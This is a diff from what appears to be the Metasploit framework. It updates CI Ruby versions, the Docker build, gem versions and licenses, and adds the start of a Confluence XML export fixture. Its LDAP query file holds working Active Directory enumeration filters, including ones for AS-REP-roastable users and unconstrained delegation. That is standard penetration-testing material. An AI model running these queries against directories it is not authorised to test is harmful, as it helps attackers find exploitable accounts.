@@ -67,7 +67,7 @@ jobs:
|
||||
- '3.0'
|
||||
- '3.1'
|
||||
- '3.2'
|
||||
- '3.3.0-preview1'
|
||||
- '3.3.0-preview3'
|
||||
os:
|
||||
- ubuntu-20.04
|
||||
- ubuntu-latest
|
||||
|
||||
+10
-3
@@ -1,4 +1,4 @@
|
||||
FROM ruby:3.0.5-alpine3.15 AS builder
|
||||
FROM ruby:3.1.4-alpine3.18 AS builder
|
||||
LABEL maintainer="Rapid7"
|
||||
|
||||
ARG BUNDLER_CONFIG_ARGS="set clean 'true' set no-cache 'true' set system 'true' set without 'development test coverage'"
|
||||
@@ -49,8 +49,9 @@ RUN mkdir -p $TOOLS_HOME/bin && \
|
||||
cd go/src && \
|
||||
./make.bash
|
||||
|
||||
FROM ruby:3.0.5-alpine3.15
|
||||
FROM ruby:3.1.4-alpine3.18
|
||||
LABEL maintainer="Rapid7"
|
||||
ARG TARGETARCH
|
||||
|
||||
ENV APP_HOME=/usr/src/metasploit-framework
|
||||
ENV TOOLS_HOME=/usr/src/tools
|
||||
@@ -62,7 +63,13 @@ RUN addgroup -S $METASPLOIT_GROUP
|
||||
|
||||
RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs \
|
||||
postgresql-libs python3 py3-pip ncurses libcap su-exec alpine-sdk \
|
||||
openssl-dev nasm mingw-w64-gcc
|
||||
openssl-dev nasm
|
||||
RUN\
|
||||
if [ "${TARGETARCH}" = "arm64" ];\
|
||||
then apk add --no-cache gcc musl-dev python3-dev libffi-dev gcompat;\
|
||||
else apk add --no-cache mingw-w64-gcc;\
|
||||
fi
|
||||
|
||||
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
|
||||
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)
|
||||
|
||||
+6
-6
@@ -1,7 +1,7 @@
|
||||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (6.3.38)
|
||||
metasploit-framework (6.3.48)
|
||||
actionpack (~> 7.0.0)
|
||||
activerecord (~> 7.0.0)
|
||||
activesupport (~> 7.0.0)
|
||||
@@ -33,7 +33,7 @@ PATH
|
||||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 2.0.156)
|
||||
metasploit-payloads (= 2.0.161)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 1.0.26)
|
||||
mqtt
|
||||
@@ -80,7 +80,7 @@ PATH
|
||||
rex-zip
|
||||
ruby-macho
|
||||
ruby-mysql
|
||||
ruby_smb (~> 3.2.0)
|
||||
ruby_smb (~> 3.3.0)
|
||||
rubyntlm
|
||||
rubyzip
|
||||
sinatra
|
||||
@@ -278,7 +278,7 @@ GEM
|
||||
activemodel (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
railties (~> 7.0)
|
||||
metasploit-payloads (2.0.156)
|
||||
metasploit-payloads (2.0.161)
|
||||
metasploit_data_models (6.0.3)
|
||||
activerecord (~> 7.0)
|
||||
activesupport (~> 7.0)
|
||||
@@ -418,7 +418,7 @@ GEM
|
||||
metasm
|
||||
rex-core
|
||||
rex-text
|
||||
rex-socket (0.1.54)
|
||||
rex-socket (0.1.55)
|
||||
rex-core
|
||||
rex-sslscan (0.1.10)
|
||||
rex-core
|
||||
@@ -473,7 +473,7 @@ GEM
|
||||
ruby-progressbar (1.13.0)
|
||||
ruby-rc4 (0.1.5)
|
||||
ruby2_keywords (0.0.5)
|
||||
ruby_smb (3.2.5)
|
||||
ruby_smb (3.3.1)
|
||||
bindata
|
||||
openssl-ccm
|
||||
openssl-cmac
|
||||
|
||||
+84
-82
@@ -1,27 +1,28 @@
|
||||
This file is auto-generated by tools/dev/update_gem_licenses.sh
|
||||
Ascii85, 1.1.0, MIT
|
||||
actionpack, 7.0.5, MIT
|
||||
actionview, 7.0.5, MIT
|
||||
activemodel, 7.0.5, MIT
|
||||
activerecord, 7.0.5, MIT
|
||||
activesupport, 7.0.5, MIT
|
||||
addressable, 2.8.4, "Apache 2.0"
|
||||
actionpack, 7.0.8, MIT
|
||||
actionview, 7.0.8, MIT
|
||||
activemodel, 7.0.8, MIT
|
||||
activerecord, 7.0.8, MIT
|
||||
activesupport, 7.0.8, MIT
|
||||
addressable, 2.8.5, "Apache 2.0"
|
||||
afm, 0.2.2, MIT
|
||||
allure-rspec, 2.22.0, "Apache 2.0"
|
||||
allure-ruby-commons, 2.22.0, "Apache 2.0"
|
||||
allure-rspec, 2.23.0, "Apache 2.0"
|
||||
allure-ruby-commons, 2.23.0, "Apache 2.0"
|
||||
arel-helpers, 2.14.0, MIT
|
||||
ast, 2.4.2, MIT
|
||||
aws-eventstream, 1.2.0, "Apache 2.0"
|
||||
aws-partitions, 1.776.0, "Apache 2.0"
|
||||
aws-sdk-core, 3.174.0, "Apache 2.0"
|
||||
aws-sdk-ec2, 1.382.0, "Apache 2.0"
|
||||
aws-sdk-ec2instanceconnect, 1.27.0, "Apache 2.0"
|
||||
aws-sdk-iam, 1.79.0, "Apache 2.0"
|
||||
aws-sdk-kms, 1.66.0, "Apache 2.0"
|
||||
aws-sdk-s3, 1.123.1, "Apache 2.0"
|
||||
aws-sdk-ssm, 1.151.0, "Apache 2.0"
|
||||
aws-sigv4, 1.5.2, "Apache 2.0"
|
||||
bcrypt, 3.1.18, MIT
|
||||
aws-partitions, 1.834.0, "Apache 2.0"
|
||||
aws-sdk-core, 3.185.1, "Apache 2.0"
|
||||
aws-sdk-ec2, 1.411.0, "Apache 2.0"
|
||||
aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
|
||||
aws-sdk-iam, 1.87.0, "Apache 2.0"
|
||||
aws-sdk-kms, 1.72.0, "Apache 2.0"
|
||||
aws-sdk-s3, 1.136.0, "Apache 2.0"
|
||||
aws-sdk-ssm, 1.158.0, "Apache 2.0"
|
||||
aws-sigv4, 1.6.0, "Apache 2.0"
|
||||
base64, 0.1.1, "ruby, Simplified BSD"
|
||||
bcrypt, 3.1.19, MIT
|
||||
bcrypt_pbkdf, 1.1.0, MIT
|
||||
bindata, 2.4.15, "Simplified BSD"
|
||||
bootsnap, 1.16.0, MIT
|
||||
@@ -48,12 +49,12 @@ erubi, 1.12.0, MIT
|
||||
eventmachine, 1.2.7, "ruby, GPL-2.0"
|
||||
factory_bot, 6.2.1, MIT
|
||||
factory_bot_rails, 6.2.0, MIT
|
||||
faker, 3.2.0, MIT
|
||||
faraday, 2.7.6, MIT
|
||||
faker, 3.2.1, MIT
|
||||
faraday, 2.7.11, MIT
|
||||
faraday-net_http, 3.0.2, MIT
|
||||
faraday-retry, 2.2.0, MIT
|
||||
faye-websocket, 0.11.2, "Apache 2.0"
|
||||
ffi, 1.15.5, "New BSD"
|
||||
faye-websocket, 0.11.3, "Apache 2.0"
|
||||
ffi, 1.16.3, "New BSD"
|
||||
filesize, 0.2.0, MIT
|
||||
fivemat, 1.3.7, MIT
|
||||
gssapi, 1.3.1, MIT
|
||||
@@ -66,38 +67,39 @@ http_parser.rb, 0.8.0, MIT
|
||||
httpclient, 2.8.3, ruby
|
||||
i18n, 1.14.1, MIT
|
||||
io-console, 0.6.0, "ruby, Simplified BSD"
|
||||
irb, 1.7.0, "ruby, Simplified BSD"
|
||||
irb, 1.7.4, "ruby, Simplified BSD"
|
||||
jmespath, 1.6.2, "Apache 2.0"
|
||||
jsobfu, 0.4.2, "New BSD"
|
||||
json, 2.6.3, ruby
|
||||
language_server-protocol, 3.17.0.3, MIT
|
||||
little-plugger, 1.1.4, MIT
|
||||
logging, 2.3.1, MIT
|
||||
loofah, 2.21.3, MIT
|
||||
macaddr, 1.7.2, ruby
|
||||
memory_profiler, 1.0.1, MIT
|
||||
metasm, 1.0.5, LGPL-2.1
|
||||
metasploit-concern, 5.0.1, "New BSD"
|
||||
metasploit-credential, 6.0.5, "New BSD"
|
||||
metasploit-framework, 6.3.38, "New BSD"
|
||||
metasploit-model, 5.0.1, "New BSD"
|
||||
metasploit-payloads, 2.0.156, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 6.0.2, "New BSD"
|
||||
metasploit-concern, 5.0.2, "New BSD"
|
||||
metasploit-credential, 6.0.6, "New BSD"
|
||||
metasploit-framework, 6.3.48, "New BSD"
|
||||
metasploit-model, 5.0.2, "New BSD"
|
||||
metasploit-payloads, 2.0.161, "3-clause (or ""modified"") BSD"
|
||||
metasploit_data_models, 6.0.3, "New BSD"
|
||||
metasploit_payloads-mettle, 1.0.26, "3-clause (or ""modified"") BSD"
|
||||
method_source, 1.0.0, MIT
|
||||
mime-types, 3.4.1, MIT
|
||||
mime-types-data, 3.2023.0218.1, MIT
|
||||
mini_portile2, 2.8.2, MIT
|
||||
minitest, 5.18.0, MIT
|
||||
mime-types, 3.5.1, MIT
|
||||
mime-types-data, 3.2023.1003, MIT
|
||||
mini_portile2, 2.8.4, MIT
|
||||
minitest, 5.20.0, MIT
|
||||
mqtt, 0.6.0, MIT
|
||||
msgpack, 1.6.1, "Apache 2.0"
|
||||
multi_json, 1.15.0, MIT
|
||||
mustermann, 3.0.0, MIT
|
||||
nessus_rest, 0.1.6, MIT
|
||||
net-imap, 0.3.7, "ruby, Simplified BSD"
|
||||
net-imap, 0.4.0, "ruby, Simplified BSD"
|
||||
net-ldap, 0.18.0, MIT
|
||||
net-protocol, 0.2.1, "ruby, Simplified BSD"
|
||||
net-smtp, 0.3.3, "ruby, Simplified BSD"
|
||||
net-ssh, 7.1.0, MIT
|
||||
net-smtp, 0.4.0, "ruby, Simplified BSD"
|
||||
net-ssh, 7.2.0, MIT
|
||||
network_interface, 0.0.4, MIT
|
||||
nexpose, 7.3.0, "New BSD"
|
||||
nio4r, 2.5.9, MIT
|
||||
@@ -109,101 +111,101 @@ openssl-cmac, 2.0.2, MIT
|
||||
openvas-omp, 0.0.4, MIT
|
||||
packetfu, 2.0.0, "New BSD"
|
||||
parallel, 1.23.0, MIT
|
||||
parser, 3.2.2.3, MIT
|
||||
parser, 3.2.2.4, MIT
|
||||
patch_finder, 1.0.2, "New BSD"
|
||||
pcaprub, 0.13.1, LGPL-2.1
|
||||
pdf-reader, 2.11.0, MIT
|
||||
pg, 1.5.3, "Simplified BSD"
|
||||
pg, 1.5.4, "Simplified BSD"
|
||||
pry, 0.14.2, MIT
|
||||
pry-byebug, 3.10.1, MIT
|
||||
public_suffix, 5.0.1, MIT
|
||||
puma, 6.3.0, "New BSD"
|
||||
racc, 1.7.0, "ruby, Simplified BSD"
|
||||
rack, 2.2.7, MIT
|
||||
rack-protection, 3.0.6, MIT
|
||||
public_suffix, 5.0.3, MIT
|
||||
puma, 6.4.0, "New BSD"
|
||||
racc, 1.7.1, "ruby, Simplified BSD"
|
||||
rack, 2.2.8, MIT
|
||||
rack-protection, 3.1.0, MIT
|
||||
rack-test, 2.1.0, MIT
|
||||
rails-dom-testing, 2.0.3, MIT
|
||||
rails-dom-testing, 2.2.0, MIT
|
||||
rails-html-sanitizer, 1.6.0, MIT
|
||||
railties, 7.0.5, MIT
|
||||
railties, 7.0.8, MIT
|
||||
rainbow, 3.1.1, MIT
|
||||
rake, 13.0.6, MIT
|
||||
rasn1, 0.12.1, MIT
|
||||
rb-readline, 0.5.5, BSD
|
||||
recog, 3.1.1, unknown
|
||||
recog, 3.1.2, unknown
|
||||
redcarpet, 3.6.0, MIT
|
||||
regexp_parser, 2.8.0, MIT
|
||||
reline, 0.3.5, ruby
|
||||
regexp_parser, 2.8.1, MIT
|
||||
reline, 0.3.8, ruby
|
||||
require_all, 3.0.0, MIT
|
||||
rex-arch, 0.1.14, "New BSD"
|
||||
rex-bin_tools, 0.1.8, "New BSD"
|
||||
rex-arch, 0.1.15, "New BSD"
|
||||
rex-bin_tools, 0.1.9, "New BSD"
|
||||
rex-core, 0.1.31, "New BSD"
|
||||
rex-encoder, 0.1.6, "New BSD"
|
||||
rex-exploitation, 0.1.38, "New BSD"
|
||||
rex-java, 0.1.6, "New BSD"
|
||||
rex-mime, 0.1.7, "New BSD"
|
||||
rex-nop, 0.1.2, "New BSD"
|
||||
rex-ole, 0.1.7, "New BSD"
|
||||
rex-powershell, 0.1.97, "New BSD"
|
||||
rex-random_identifier, 0.1.10, "New BSD"
|
||||
rex-registry, 0.1.4, "New BSD"
|
||||
rex-rop_builder, 0.1.4, "New BSD"
|
||||
rex-socket, 0.1.54, "New BSD"
|
||||
rex-sslscan, 0.1.9, "New BSD"
|
||||
rex-struct2, 0.1.3, "New BSD"
|
||||
rex-text, 0.2.52, "New BSD"
|
||||
rex-zip, 0.1.4, "New BSD"
|
||||
rexml, 3.2.5, "Simplified BSD"
|
||||
rex-encoder, 0.1.7, "New BSD"
|
||||
rex-exploitation, 0.1.39, "New BSD"
|
||||
rex-java, 0.1.7, "New BSD"
|
||||
rex-mime, 0.1.8, "New BSD"
|
||||
rex-nop, 0.1.3, "New BSD"
|
||||
rex-ole, 0.1.8, "New BSD"
|
||||
rex-powershell, 0.1.99, "New BSD"
|
||||
rex-random_identifier, 0.1.11, "New BSD"
|
||||
rex-registry, 0.1.5, "New BSD"
|
||||
rex-rop_builder, 0.1.5, "New BSD"
|
||||
rex-socket, 0.1.55, "New BSD"
|
||||
rex-sslscan, 0.1.10, "New BSD"
|
||||
rex-struct2, 0.1.4, "New BSD"
|
||||
rex-text, 0.2.53, "New BSD"
|
||||
rex-zip, 0.1.5, "New BSD"
|
||||
rexml, 3.2.6, "Simplified BSD"
|
||||
rkelly-remix, 0.0.7, MIT
|
||||
rspec, 3.12.0, MIT
|
||||
rspec-core, 3.12.2, MIT
|
||||
rspec-expectations, 3.12.3, MIT
|
||||
rspec-mocks, 3.12.5, MIT
|
||||
rspec-mocks, 3.12.6, MIT
|
||||
rspec-rails, 6.0.3, MIT
|
||||
rspec-rerun, 1.1.0, MIT
|
||||
rspec-support, 3.12.0, MIT
|
||||
rubocop, 1.52.0, MIT
|
||||
rspec-support, 3.12.1, MIT
|
||||
rubocop, 1.56.4, MIT
|
||||
rubocop-ast, 1.29.0, MIT
|
||||
ruby-macho, 3.0.0, MIT
|
||||
ruby-mysql, 4.0.0, MIT
|
||||
ruby-macho, 4.0.0, MIT
|
||||
ruby-mysql, 4.1.0, MIT
|
||||
ruby-prof, 1.4.2, "Simplified BSD"
|
||||
ruby-progressbar, 1.13.0, MIT
|
||||
ruby-rc4, 0.1.5, MIT
|
||||
ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
|
||||
ruby_smb, 3.2.5, "New BSD"
|
||||
ruby_smb, 3.3.0, "New BSD"
|
||||
rubyntlm, 0.6.3, MIT
|
||||
rubyzip, 2.3.2, "Simplified BSD"
|
||||
sawyer, 0.9.2, MIT
|
||||
simplecov, 0.18.2, MIT
|
||||
simplecov-html, 0.12.3, MIT
|
||||
simpleidn, 0.2.1, MIT
|
||||
sinatra, 3.0.6, MIT
|
||||
sqlite3, 1.6.3, "New BSD"
|
||||
sshkey, 2.0.0, MIT
|
||||
sinatra, 3.1.0, MIT
|
||||
sqlite3, 1.6.6, "New BSD"
|
||||
sshkey, 3.0.0, MIT
|
||||
strptime, 0.2.5, "Simplified BSD"
|
||||
swagger-blocks, 3.0.0, MIT
|
||||
systemu, 2.6.5, ruby
|
||||
test-prof, 1.2.2, MIT
|
||||
test-prof, 1.2.3, MIT
|
||||
thin, 1.8.2, "GPL-2.0+, ruby"
|
||||
thor, 1.2.2, MIT
|
||||
tilt, 2.2.0, MIT
|
||||
timecop, 0.9.6, MIT
|
||||
tilt, 2.3.0, MIT
|
||||
timecop, 0.9.8, MIT
|
||||
timeout, 0.4.0, "ruby, Simplified BSD"
|
||||
ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
|
||||
tzinfo, 2.0.6, MIT
|
||||
tzinfo-data, 1.2023.3, MIT
|
||||
unf, 0.1.4, "2-clause BSDL"
|
||||
unf_ext, 0.0.8.2, MIT
|
||||
unicode-display_width, 2.4.2, MIT
|
||||
unicode-display_width, 2.5.0, MIT
|
||||
unix-crypt, 1.3.1, 0BSD
|
||||
uuid, 2.3.9, MIT
|
||||
warden, 1.2.9, MIT
|
||||
webrick, 1.8.1, "ruby, Simplified BSD"
|
||||
websocket-driver, 0.7.5, "Apache 2.0"
|
||||
websocket-driver, 0.7.6, "Apache 2.0"
|
||||
websocket-extensions, 0.1.5, "Apache 2.0"
|
||||
win32api, 0.1.0, unknown
|
||||
windows_error, 0.1.5, BSD
|
||||
winrm, 2.3.6, "Apache 2.0"
|
||||
xdr, 3.0.3, "Apache 2.0"
|
||||
xmlrpc, 0.3.2, "ruby, Simplified BSD"
|
||||
xmlrpc, 0.3.3, "ruby, Simplified BSD"
|
||||
yard, 0.9.34, MIT
|
||||
zeitwerk, 2.6.8, MIT
|
||||
zeitwerk, 2.6.12, MIT
|
||||
|
||||
@@ -135,7 +135,7 @@ queries:
|
||||
- https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/
|
||||
- https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
|
||||
- action: ENUM_DNS_ZONES
|
||||
description: 'Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed as without this BASEDN prefix we often miss certain entries.'
|
||||
description: 'Dump all known DNS zones using the dnsZone object class under the DC DomainDnsZones. Without A BASEDN prefix you can miss certain entries.'
|
||||
filter: '(objectClass=dnsZone)'
|
||||
base_dn_prefix: 'DC=DomainDnsZones'
|
||||
attributes:
|
||||
@@ -292,7 +292,7 @@ queries:
|
||||
references:
|
||||
- http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm
|
||||
- action: ENUM_UNCONSTRAINED_DELEGATION
|
||||
description: 'Dump info about all known objects that allow uncontrained delegation.'
|
||||
description: 'Dump info about all known objects that allow unconstrained delegation.'
|
||||
filter: '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
|
||||
attributes:
|
||||
- cn
|
||||
@@ -325,7 +325,7 @@ queries:
|
||||
references:
|
||||
- https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/useraccountcontrol-manipulate-account-properties
|
||||
- action: ENUM_USER_ASREP_ROASTABLE
|
||||
description: 'Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.'
|
||||
description: 'Dump all users who are configured not to require kerberos pre-authentication, i.e. AS-REP roastable.'
|
||||
filter: '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
|
||||
attributes:
|
||||
- cn
|
||||
|
||||
@@ -0,0 +1,4685 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<hibernate-generic datetime="2023-11-09 06:05:20">
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196658</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Lay out your page (step 6 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[lay out your page (step 6 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196654</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196655</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196656</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[get serious with a table (step 5 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196657</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[prettify the page with an image (step 4 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98332</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196650</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[let's edit this page (step 3 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196651</id>
|
||||
<property name="destinationPageTitle"><![CDATA[What is Confluence? (step 1 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[what is confluence? (step 1 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196652</id>
|
||||
<property name="destinationPageTitle"><![CDATA[A quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[a quick look at the editor (step 2 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196653</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Welcome to Confluence]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[welcome to confluence]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98322</id>
|
||||
</property>
|
||||
<property name="creator" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModifier" class="ConfluenceUserImpl" package="com.atlassian.confluence.user"><id name="key"><![CDATA[2c9280828bb2ac81018bb2ae01d80000]]></id>
|
||||
</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196646</id>
|
||||
<property name="destinationPageTitle"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196647</id>
|
||||
<property name="destinationPageTitle"><![CDATA[What is Confluence? (step 1 of 9)]]></property>
|
||||
<property name="lowerDestinationPageTitle"><![CDATA[what is confluence? (step 1 of 9)]]></property>
|
||||
<property name="destinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="lowerDestinationSpaceKey"><![CDATA[ds]]></property>
|
||||
<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="creationDate">2020-10-26 15:44:29.341</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
</object>
|
||||
<object class="OutgoingLink" package="com.atlassian.confluence.links">
|
||||
<id name="id">196648</id>
|
||||
